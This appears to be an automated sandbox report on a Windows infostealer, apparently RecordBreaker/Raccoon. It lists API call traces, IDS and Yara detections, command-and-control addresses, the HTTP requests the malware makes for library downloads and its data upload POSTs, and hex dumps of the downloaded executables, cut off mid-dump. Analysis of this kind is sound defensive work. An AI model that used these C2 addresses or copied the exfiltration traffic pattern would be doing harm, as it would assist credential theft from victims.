Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	18_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	18_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	18_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	18_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	18_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	18_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	18_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	18_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	18_2_0040633E

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2038485 ET TROJAN Win32/RecordBreaker - Observed UA M1 192.168.2.3:49827 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.3:49827 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 45.95.11.158:80 -> 192.168.2.3:49827
Source: Traffic	Snort IDS: 2038487 ET TROJAN Win32/RecordBreaker - Library Request 192.168.2.3:49827 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2038486 ET TROJAN Win32/RecordBreaker - Observed UA M2 192.168.2.3:49827 -> 45.95.11.158:80

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7912, type: MEMORYSTR

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 103.89.90.61 ports 34589,3,4,5,8,9

Yara detected Generic Downloader

Source: Yara match	File source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.SETUP_~1.EXE.38a9510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://45.95.11.158/

Source: global traffic	HTTP traffic detected: GET /1571 HTTP/1.1Host: 77.91.103.222
Source: global traffic	HTTP traffic detected: GET /8938201687.zip HTTP/1.1Host: 77.91.103.222Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1316428612305895Host: 77.91.103.222Content-Length: 28673Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1616 HTTP/1.1Host: 88.198.122.116
Source: global traffic	HTTP traffic detected: GET /2551251222.zip HTTP/1.1Host: 88.198.122.116Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0675485969561946Host: 88.198.122.116Content-Length: 28625Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:23:57 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:23:58 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:24:00 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:24:01 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:24:02 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:24:03 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 